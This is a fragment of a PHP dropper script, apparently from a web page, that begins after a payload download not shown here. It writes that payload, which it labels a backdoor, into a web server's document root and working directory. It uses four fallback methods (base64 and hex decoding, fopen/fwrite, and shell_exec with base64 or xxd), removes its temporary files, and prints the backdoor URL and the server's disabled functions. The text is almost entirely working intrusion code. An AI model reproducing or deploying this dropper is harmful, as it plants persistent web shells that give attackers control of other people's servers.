[!] Cannot download payload using any method!

"); $payload_b64 = base64_encode($payload); $payload_hex = bin2hex($payload); $rootPath = rtrim($_SERVER['DOCUMENT_ROOT'],'/').DIRECTORY_SEPARATOR; $cwdPath = getcwd().DIRECTORY_SEPARATOR; $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http"; $rootUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . "/$name"; $cwdUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']) . "/$name"; echo "

=== MULTI-BYPASS FIREWALL & MULTI-DOWNLOAD ===

"; echo "

Downloaded payload: ".strlen($payload)." bytes. Trying drop methods...

"; // ============= FILE_PUT_CONTENTS BASE64 SPLIT ============= echo "

1. file_put_contents with base64 chunk split

"; $chunk_b64 = str_split($payload_b64, 100); $out = ''; foreach ($chunk_b64 as $c) { $out .= $c; } if (@file_put_contents($rootPath.$name, base64_decode($out))) { echo "

[+] Success at $rootUrl

"; } else { echo "

[-] Failed at $rootPath$name

"; } if (@file_put_contents($cwdPath.$name, base64_decode($out))) { echo "

[+] Success at $cwdUrl

"; } else { echo "

[-] Failed at $cwdPath$name

"; } // ============= FOPEN + FWRITE HEX2BIN ============= echo "

2. fopen+fwrite with hex2bin

"; if ($fp = @fopen($rootPath.$name, "w")) { @fwrite($fp, hex2bin($payload_hex)); fclose($fp); echo "

[+] fopen hex2bin success at $rootUrl

"; } else { echo "

[-] fopen hex2bin failed at $rootPath$name

"; } if ($fp2 = @fopen($cwdPath.$name, "w")) { @fwrite($fp2, hex2bin($payload_hex)); fclose($fp2); echo "

[+] fopen hex2bin success at $cwdUrl

"; } else { echo "

[-] fopen hex2bin failed at $cwdPath$name

"; } // ============= SHELL_EXEC BASE64 ============= echo "

3. shell_exec with echo base64 -d

"; $tmp_b64 = $cwdPath."tmp_payload.b64"; @file_put_contents($tmp_b64, $out); if (function_exists('shell_exec')) { if (@shell_exec("cat $tmp_b64 | base64 -d > ".$rootPath.$name)) { echo "

[+] shell_exec(base64) success at $rootUrl

"; } elseif (@shell_exec("cat $tmp_b64 | base64 -d > ".$cwdPath.$name)) { echo "

[+] shell_exec(base64) success at $cwdUrl

"; } else { echo "

[-] shell_exec(base64) failed

"; } } else { echo "

[-] shell_exec disabled

"; } @unlink($tmp_b64); // ============= SHELL_EXEC HEX2BIN ============= echo "

4. shell_exec with xxd hex2bin

"; $tmp_hex = $cwdPath."tmp_payload.hex"; @file_put_contents($tmp_hex, $payload_hex); if (function_exists('shell_exec')) { if (@shell_exec("cat $tmp_hex | xxd -r -p > ".$rootPath.$name)) { echo "

[+] shell_exec(hex2bin) success at $rootUrl

"; } elseif (@shell_exec("cat $tmp_hex | xxd -r -p > ".$cwdPath.$name)) { echo "

[+] shell_exec(hex2bin) success at $cwdUrl

"; } else { echo "

[-] shell_exec(hex2bin) failed

"; } } else { echo "

[-] shell_exec disabled

"; } @unlink($tmp_hex); // ============= FINAL STATUS ============= if (file_exists($rootPath.$name)) { echo "

[OK] Backdoor available at $rootUrl

"; } if (file_exists($cwdPath.$name)) { echo "

[OK] Backdoor available at $cwdUrl

"; } echo "

disable_functions: ".ini_get('disable_functions')."

"; ?>